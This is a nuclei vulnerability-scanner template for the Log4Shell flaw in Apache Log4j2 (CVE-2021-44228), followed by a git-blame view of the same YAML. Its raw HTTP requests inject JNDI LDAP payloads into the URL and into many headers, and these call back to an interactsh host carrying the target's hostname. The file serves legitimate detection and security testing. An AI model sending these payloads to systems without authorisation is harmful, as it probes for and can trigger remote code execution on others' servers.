nuclei-templates/http/cves/2021/CVE-2021-44228.yaml

id: CVE-2021-44228

info:
  name: Apache Log4j2 Remote Code Injection
  author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea,j4vaovo
  severity: critical
  description: |
    Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
  remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
  reference:
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-917,CWE-20
    epss-score: 0.97453
    epss-percentile: 0.99942
    cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: log4j
  tags: cve,cve2021,rce,oast,log4j,injection,kev
variables:
  rand1: '{{rand_int(111, 999)}}'
  rand2: '{{rand_int(111, 999)}}'

http:
  - raw:
      - |
        GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
        Host: {{Hostname}}
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
        Accept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}
        Accept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}
        Access-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
        Access-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
        Authentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}
        Authentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}
        Cookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}
        Location: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}
        Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}
        Referer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}
        Upgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
        User-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}
        X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}
        X-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}
        X-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}
        X-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}
        X-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'

    extractors:
      - type: kval
        kval:
          - interactsh_ip # Print remote interaction IP in output

      - type: regex
        group: 2
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
        part: interactsh_request

      - type: regex
        group: 1
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
        part: interactsh_request
# digest: 4a0a00473045022100a14db5525c3172303c46ac970f597b81c79a1ece9347c420a56d3a42b2e5601b022010223de7374f1224b2fbff2f4957851340102872389476e3daa0fad4ec5eb50b:922c64590222798bb761d5b6d8e72950
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`id: CVE-2021-44228`

			`info:`
Enhancement: cves/2021/CVE-2021-44228.yaml by mp 2022-02-28 21:43:59 +00:00			`name: Apache Log4j2 Remote Code Injection`
Update CVE-2021-44228.yaml 2023-04-23 17:42:42 +00:00			`author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea,j4vaovo`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`severity: critical`
Update CVE-2021-44228.yaml 2022-07-16 17:08:13 +00:00			`description: \|`
			`Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`reference:`
Enhancement: cves/2021/CVE-2021-44228.yaml by mp 2022-02-28 18:48:26 +00:00			`- https://logging.apache.org/log4j/2.x/security.html`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-44228`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q`
			`- https://www.lunasec.io/docs/blog/log4j-zero-day/`
			`- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a`
Auto Generated CVE annotations [Mon Dec 20 14:33:22 UTC 2021] :robot: 2021-12-20 14:33:22 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-score: 10`
Auto Generated CVE annotations [Mon Dec 20 14:33:22 UTC 2021] :robot: 2021-12-20 14:33:22 +00:00			`cve-id: CVE-2021-44228`
TemplateMan Update [Mon Nov 6 09:19:20 UTC 2023] :robot: 2023-11-06 09:19:20 +00:00			`cwe-id: CWE-917,CWE-20`
TemplateMan Update [Fri Oct 27 16:34:45 UTC 2023] :robot: 2023-10-27 16:34:45 +00:00			`epss-score: 0.97453`
			`epss-percentile: 0.99942`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:apache:log4j::::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: apache`
			`product: log4j`
			`tags: cve,cve2021,rce,oast,log4j,injection,kev`
Update CVE-2021-44228.yaml 2023-04-23 17:42:42 +00:00			`variables:`
			`rand1: '{{rand_int(111, 999)}}'`
			`rand2: '{{rand_int(111, 999)}}'`

updated template path and protocol name 2023-05-01 03:37:12 +00:00			`http:`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`- raw:`
			`- \|`
Update CVE-2021-44228.yaml 2023-04-23 17:43:03 +00:00			`GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1`
Added Spring Boot Log4j Remote Code Injection (#3993) * Added Spring Boot Log4j Remote Code Injection * minor improvements to CVE-2021-44228 * URI based payload update to catch injection point 2022-03-27 20:16:50 +00:00			`Host: {{Hostname}}`
			`- \|`
			`GET / HTTP/1.1`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`Host: {{Hostname}}`
Update CVE-2021-44228.yaml 2023-04-23 17:42:42 +00:00			`Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}`
			`Accept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}`
			`Accept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}`
			`Access-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}`
			`Access-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}`
			`Authentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}`
			`Authentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}`
			`Cookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}`
			`Location: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}`
			`Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}`
			`Referer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}`
			`Upgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}`
			`User-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}`
			`X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}`
			`X-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}`
			`X-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}`
			`X-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}`
			`X-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}`

Added Spring Boot Log4j Remote Code Injection (#3993) * Added Spring Boot Log4j Remote Code Injection * minor improvements to CVE-2021-44228 * URI based payload update to catch injection point 2022-03-27 20:16:50 +00:00			`stop-at-first-match: true`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`part: interactsh_protocol # Confirms the DNS Interaction`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`words:`
			`- "dns"`

			`- type: regex`
			`part: interactsh_request`
			`regex:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00
			`extractors:`
Update CVE-2021-44228.yaml - Extract DNS interaction IP (#3396) * Update CVE-2021-44228.yaml * lint fix Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-22 12:47:30 +00:00			`- type: kval`
			`kval:`
reverted log4j templates 2023-10-19 14:35:43 +00:00			`- interactsh_ip # Print remote interaction IP in output`
Update CVE-2021-44228.yaml - Extract DNS interaction IP (#3396) * Update CVE-2021-44228.yaml * lint fix Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-22 12:47:30 +00:00
Updated CVE-2021-44228 with most common vulnerable headers (#3334) * Updated with common headers which can be exploited Reference : https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell These headers are collected from above blog in Detecting the Vulnerability part * fix: lint update * Update CVE-2021-44228.yaml * Update CVE-2021-44228.yaml * Updated changed matchers and extractors regex according to v8.7.3 update * payload updates for CVE-2021-44228 - more injection points - a fixed regex to extract uppercase hostnames - standardized payloads - printed injection points Source - https://twitter.com/0xceba/status/1471664540542648322 Co-Authored-By: 0xceba <44234156+0xceba@users.noreply.github.com> Co-Authored-By: Abhiram V <61599526+Anon-Artist@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: 0xceba <44234156+0xceba@users.noreply.github.com> 2021-12-18 05:21:45 +00:00			`- type: regex`
			`group: 2`
			`regex:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'`
			`part: interactsh_request`
Updated CVE-2021-44228 with most common vulnerable headers (#3334) * Updated with common headers which can be exploited Reference : https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell These headers are collected from above blog in Detecting the Vulnerability part * fix: lint update * Update CVE-2021-44228.yaml * Update CVE-2021-44228.yaml * Updated changed matchers and extractors regex according to v8.7.3 update * payload updates for CVE-2021-44228 - more injection points - a fixed regex to extract uppercase hostnames - standardized payloads - printed injection points Source - https://twitter.com/0xceba/status/1471664540542648322 Co-Authored-By: 0xceba <44234156+0xceba@users.noreply.github.com> Co-Authored-By: Abhiram V <61599526+Anon-Artist@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: 0xceba <44234156+0xceba@users.noreply.github.com> 2021-12-18 05:21:45 +00:00
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`- type: regex`
			`group: 1`
			`regex:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'`
Auto Template Signing [Thu Oct 19 14:45:53 UTC 2023] :robot: 2023-10-19 14:45:53 +00:00			`part: interactsh_request`
Auto Template Signing [Mon Nov 6 11:34:24 UTC 2023] :robot: 2023-11-06 11:34:24 +00:00			`# digest: 4a0a00473045022100a14db5525c3172303c46ac970f597b81c79a1ece9347c420a56d3a42b2e5601b022010223de7374f1224b2fbff2f4957851340102872389476e3daa0fad4ec5eb50b:922c64590222798bb761d5b6d8e72950`